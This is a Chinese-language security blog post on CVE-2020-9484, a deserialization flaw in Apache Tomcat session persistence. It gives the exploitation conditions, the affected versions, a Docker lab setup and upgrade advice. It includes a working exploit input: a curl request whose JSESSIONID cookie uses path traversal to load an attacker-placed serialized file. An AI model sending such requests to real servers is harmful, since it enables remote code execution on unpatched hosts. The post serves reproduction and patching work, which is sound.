聲明：該文章由作者（ksbugs-so）發(fā)表，轉(zhuǎn)載此文章須經(jīng)作者同意并請附上出處(0XUCN)及本頁鏈接。。

前言

Apache Tomcat 是一個(gè)開放源代碼、運(yùn)行servlet和JSP Web應(yīng)用軟件的基于Java的Web應(yīng)用軟件容器。

當(dāng)Tomcat使用了自帶session同步功能時(shí)，使用不安全的配置（沒有使用EncryptInterceptor）會存在反序列化漏洞，攻擊者通過精心構(gòu)造的數(shù)據(jù)包， 可以對使用了自帶session同步功能的Tomcat服務(wù)器進(jìn)行攻擊。

漏洞分析

1、攻擊者能夠控制服務(wù)器上文件的內(nèi)容和文件名稱

2、服務(wù)器PersistenceManager配置中使用了FileStore

3、PersistenceManager中的sessionAttributeValueClassNameFilter被配置為“null”，或者過濾器不夠嚴(yán)格，導(dǎo)致允許攻擊者提供反序列化數(shù)據(jù)的對象

4、攻擊者知道使用的FileStore存儲位置到攻擊者可控文件的相對路徑

影響版本

Apache Tomcat 10.0.0-M1—10.0.0-M4

Apache Tomcat 9.0.0.M1—9.0.34

Apache Tomcat 8.5.0—8.5.54

Apache Tomcat 7.0.0—7.0.103

環(huán)境搭建

$ git clone https://github.com/masahiro331/CVE-2020-9484.git

$ cd CVE-2020-9484

$ docker build -t tomcat:groovy .

$ docker run -d -p 8080:8080 tomcat:groovy

http://yourip:8080即可打開網(wǎng)站

漏洞復(fù)現(xiàn)

參考https://github.com/masahiro331/CVE-2020-9484? ?

curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy'

修復(fù)建議

升級到 Apache Tomcat 10.0.0-M5 及以上版本

升級到 Apache Tomcat 9.0.35 及以上版本

升級到 Apache Tomcat 8.5.55 及以上版本

升級到 Apache Tomcat 7.0.104 及以上版本

臨時(shí)修補(bǔ)建議：

禁止使用Session持久化功能FileStore。

內(nèi)容來自：

安徽鋒刃科技

[超站]友情鏈接：

四季很好，只要有你，文娛排行榜：https://www.yaopaiming.com/
關(guān)注數(shù)據(jù)與安全，洞悉企業(yè)級服務(wù)市場：https://www.ijiandao.com/